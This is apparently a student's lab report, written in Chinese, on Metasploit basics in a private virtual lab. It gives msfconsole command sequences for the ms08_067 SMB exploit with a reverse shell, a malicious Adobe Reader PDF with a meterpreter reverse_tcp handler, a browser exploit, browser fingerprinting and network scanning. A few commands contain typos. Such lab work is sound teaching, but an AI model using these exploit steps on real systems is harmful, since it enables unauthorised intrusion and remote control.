20155328 網絡攻防 實驗五:MSF基礎應用
20155328 網絡攻防 實驗五:MSF基礎應用
實踐內容及過程記錄
一、Windows服務滲透攻擊————ms08_067
攻擊機:kali
靶機:WindowsXP(英文版)
第一步,分別查看攻擊機和靶機的IP。
在kali終端中,輸入msfconsole
進入msf控制臺,依次輸入以下指令:
use exploit/windows/smb/ms08_067_netapiuse exploit/windows/smb/ms08_067_netapi show payloads set payload generic/shell_reverse_tcp set LHOST 192.168.127.138 set LPORT 5328 set RHOST 192.168.127.139 set target 0 exploit
攻擊成功,可以看到已經獲取了靶機的系統信息:
二、瀏覽器滲透攻擊————ms11_103
在kali終端輸入msfconsole打開msf控制臺,輸入以下參數:
被攻擊的主機可以看到網頁無法正常打開:
回到kali,輸入以下指令:
sessions
sessions -i n//n為顯示的最大進程號
可以看到攻擊成功了。
三、針對Adobe Reader的滲透攻擊
在kali中進入msf控制臺,輸入以下指令:
use windows/fileformat/adobe)cooltype_sing set payload windows/meterpreter/reverse_tcp set LHOST 192.168.127.139 set LPORT 5328 set FILENAME 20155328.pdf exploit
生成了PDF:
將生成的PDF拷貝到靶機上。
kali中輸入back,進入監聽模塊,輸入以下命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.139
set LPORT 5328
exploit
然後在靶機上打開PDF:
攻擊機顯示攻擊成功:
四、應用Aux輔助模塊
1.browser_info
在kali終端中輸入show auxiliary
,查看aux中都有哪些模塊,最後選中gather/browser_info。
進入到msf控制臺後,依次輸入以下命令:
use auxiliary/gather_browser_info
set SRVHOST 192.168.127.138 //kali的IP
set SRVPORT 5328
exploit
可以看到生成了URL,且Server Start。
復制鏈接,在靶機(WindowsXP)中進行訪問:
回到kali,可以看到已經獲取了靶機訪問該url的瀏覽器信息。
2.arp_sweep
先在kali終端中輸入以下命令,手動創建一個msf所需的數據庫:
service postgresql start
msfdb start
再輸入msfconsole
開啟msf,輸入命令use auxiliary/scanner/discovery/arp_sweep
進入模塊,設置參數:(RHOSTS填寫kali所在的網段)
設定好了以後輸入run
,可以看到除了自己主機IP外,還有三個其他IP:
在msf中輸入命令db_nmap -O 192.168.127.139
(靶機IP),可以看到開啟的端口號即靶機的目標操作系統。
基礎問題回答
用自己的話解釋什麽是exploit,payload,encode。
exploit:利用漏洞或一切可利用的東西進行獲取用戶權限、篡改文件信息等操作。
payload:在靶機上執行的一段代碼,可以反彈連接。
encode:對特征碼進行編碼,改變特征碼。
實踐總結與體會
這次實驗主要是做的小模塊比較多,感覺還。。挺厲害的。。再接再厲吧。
20155328 網絡攻防 實驗五:MSF基礎應用